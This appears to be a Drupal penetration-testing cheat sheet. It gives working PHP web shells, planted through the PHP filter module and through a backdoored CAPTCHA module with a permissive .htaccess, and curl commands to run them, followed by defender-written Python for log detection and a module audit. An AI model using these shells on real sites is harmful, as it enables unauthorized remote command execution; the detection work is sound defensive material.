Drupal
Footprinting and Enumeration
# Confirm the site is running Drupal
curl -s http://drupalsite.local | grep Drupal
# Find the version: CHANGELOG.txt starts with the release line, so print its first two lines
curl -s http://drupalsite.local/CHANGELOG.txt | grep -m2 ""
Droopescan
# Normal scan with droopescan
droopescan scan drupal -u http://drupalsite.local
Attacking Drupal
Code Execution
# Applies to versions before 8: from version 8 onwards the PHP filter module is not installed by default, but it can be installed manually
# We can get code execution by writing a PHP web shell into content rendered through the PHP filter module
# The command is passed in a GET parameter whose name is an MD5 hash
<?php
system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']);
?>
# Execute commands using curl (the shell was saved in node 3)
curl -s "http://drupalsite.local/node/3?dcfdd5e021a869fcc6dfaef8bf31377e=id" | grep uid | cut -f4 -d">"
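Detection logic for the activity in this section, written from the defender's side as an added example (it is not part of the original cheat sheet). It parses Apache combined-format access log lines (the sample lines are constructed, not real traffic) and flags three indicators: a request for CHANGELOG.txt (version fingerprinting), a query parameter whose name is a bare 32-character hex string (the MD5-named command parameter both shells on this page use), and a direct request for a PHP file under an extension directory such as /modules (in Drupal 8+ all requests are routed through index.php, so this is abnormal). The indicator names, the regexes and the "extension directory" list are my own heuristics, not Drupal rules. Python is used because this is log tooling rather than something typed into the target.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache "combined" log format; no real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Oct/2023:13:50:01 +0000] "GET /CHANGELOG.txt HTTP/1.1" 200 9000 "-" "curl/7.88.1"
192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET /node/3?dcfdd5e021a869fcc6dfaef8bf31377e=id HTTP/1.1" 200 512 "-" "curl/7.88.1"
192.0.2.10 - - [10/Oct/2023:13:55:40 +0000] "GET /modules/captcha/shell.php?fe8edbabc5c5c9b7b764504cd22b17af=id HTTP/1.1" 200 64 "-" "curl/7.88.1"
198.51.100.5 - - [10/Oct/2023:14:00:00 +0000] "GET /node/3?page=2 HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
198.51.100.5 - - [10/Oct/2023:14:00:05 +0000] "GET /modules/captcha/css/captcha.css HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# client, identd, user, [timestamp], "METHOD target protocol", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Query-parameter name that is a bare 32-char lowercase hex string (MD5-style).
HEX32_NAME = re.compile(r'^[0-9a-f]{32}$')
# Direct request for a PHP file under an extension directory (heuristic:
# Drupal 8+ routes every request through index.php, so this is abnormal).
PHP_UNDER_EXTENSIONS = re.compile(r'^/(modules|themes|profiles)/.*\.php$')


def analyse_line(line):
    """Return a list of (client_ip, path, indicator) tuples for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return []  # not in combined format; skip rather than guess
    url = urlsplit(m.group("target"))
    indicators = []
    if url.path.endswith("/CHANGELOG.txt"):
        indicators.append("version-file-probe")
    if PHP_UNDER_EXTENSIONS.match(url.path):
        indicators.append("direct-php-in-extension-dir")
    if any(HEX32_NAME.match(name) for name in parse_qs(url.query, keep_blank_values=True)):
        indicators.append("hex32-query-param")
    return [(m.group("ip"), url.path, ind) for ind in indicators]


def analyse_log(text):
    """Run analyse_line over every line of a log; returns all findings in order."""
    findings = []
    for line in text.splitlines():
        findings.extend(analyse_line(line))
    return findings


def clients_by_hits(findings):
    """Aggregate findings per client IP so the noisiest source surfaces first."""
    counts = {}
    for ip, _, _ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(counts.items(), key=lambda kv: kv[1], reverse=True)


if __name__ == "__main__":
    hits = analyse_log(SAMPLE_LOG)
    for ip, path, indicator in hits:
        print(f"{ip:15} {indicator:28} {path}")
    print("per client:", clients_by_hits(hits))
```

Run it against a real access log with `analyse_log(open("access.log").read())`; the hex32 rule is the strongest signal of the three, since legitimate Drupal query parameters (`page`, `destination`, `_format`) are readable names, while the CHANGELOG.txt rule mostly identifies scanners and should be combined with a check that the file is not served at all.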
Uploading a Backdoored Module
# Download any module from drupal.org, for example CAPTCHA
wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz
# Create a PHP web shell (shell.php) with the contents:
<?php
system($_GET['fe8edbabc5c5c9b7b764504cd22b17af']);
?>
# Next, create a .htaccess file that gives us access to the folder; this is necessary because Drupal denies direct access to the /modules folder.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>
# Copy both files into the captcha folder and create a gzip-compressed archive (-z, to match the .tar.gz name)
mv shell.php .htaccess captcha
tar czvf captcha.tar.gz captcha/
# Install the module at http://drupal.inlanefreight.local/admin/modules/install
# After successful installation, browse to /modules/captcha/shell.php to execute commands.
curl -s "drupalsite.local/modules/captcha/shell.php?fe8edbabc5c5c9b7b764504cd22b17af=id"
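A filesystem audit for the planted-module technique above, added here as a defender's example (not part of the original cheat sheet and not a Drupal tool). It walks a Drupal modules directory and reports two things: an .htaccess inside a module that turns rewriting on without any deny rule (a contributed module has no reason to ship one), and any PHP-type file that passes raw request input (`$_GET`, `$_POST`, ...) to a shell-execution function. The sample tree is constructed in a temporary directory and contains a clean module beside the two files described above; the indicator names, the suffix list and the regexes are my own heuristics and will need tuning for a real site.

```python
import os
import re
import tempfile

# Heuristics (mine, not Drupal's): a module should not ship an .htaccess that
# switches rewriting on without also denying access, and no module file should
# hand raw request input to a shell-execution function.
REWRITE_ON = re.compile(r'^\s*RewriteEngine\s+On\b', re.I | re.M)
DENY_RULES = re.compile(r'Require all denied|Deny from all|php_flag\s+engine\s+off', re.I)
SHELL_FUNCS = re.compile(r'\b(system|shell_exec|passthru|exec|popen|proc_open|eval)\s*\(', re.I)
REQUEST_INPUT = re.compile(r'\$_(GET|POST|REQUEST|COOKIE)\b')
PHP_SUFFIXES = (".php", ".module", ".inc", ".install", ".theme")

# Constructed sample: one clean module (token), one module with the two planted files.
SAMPLE_FILES = {
    "captcha/captcha.info.yml": "name: CAPTCHA\ntype: module\n",
    "captcha/captcha.module": "<?php\nfunction captcha_help($route_name) {\n  return '';\n}\n",
    "captcha/src/CaptchaSettingsForm.php": "<?php\nnamespace Drupal\\captcha\\Form;\nclass CaptchaSettingsForm {}\n",
    "captcha/.htaccess": "<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteBase /\n</IfModule>\n",
    "captcha/shell.php": "<?php\nsystem($_GET['fe8edbabc5c5c9b7b764504cd22b17af']);\n",
    "token/token.module": "<?php\nfunction token_help() {\n  return '';\n}\n",
}


def audit_modules_dir(root):
    """Walk a modules directory; return sorted (relative_path, indicator) findings."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            rel = os.path.relpath(path, root)
            if name == ".htaccess" and REWRITE_ON.search(text) and not DENY_RULES.search(text):
                findings.append((rel, "htaccess-reenables-rewrite"))
            if name.endswith(PHP_SUFFIXES) and SHELL_FUNCS.search(text) and REQUEST_INPUT.search(text):
                findings.append((rel, "request-input-to-shell"))
    return sorted(findings)


def build_tree(files):
    """Write a {relative_path: content} mapping into a fresh temp dir and return its root."""
    root = tempfile.mkdtemp(prefix="drupal-modules-")
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


def build_sample_tree():
    """Materialise the constructed sample above."""
    return build_tree(SAMPLE_FILES)


if __name__ == "__main__":
    for rel, indicator in audit_modules_dir(build_sample_tree()):
        print(f"{indicator:28} {rel}")
```

Point `audit_modules_dir` at the real `modules/` directory (and `themes/`, `profiles/`) on a schedule and diff the output against the last run. The .htaccess finding is only possible because Apache honours per-directory overrides; setting `AllowOverride None` in the virtual host and moving Drupal's own .htaccess directives into the vhost configuration makes a dropped .htaccess inert, which removes the step the technique above depends on.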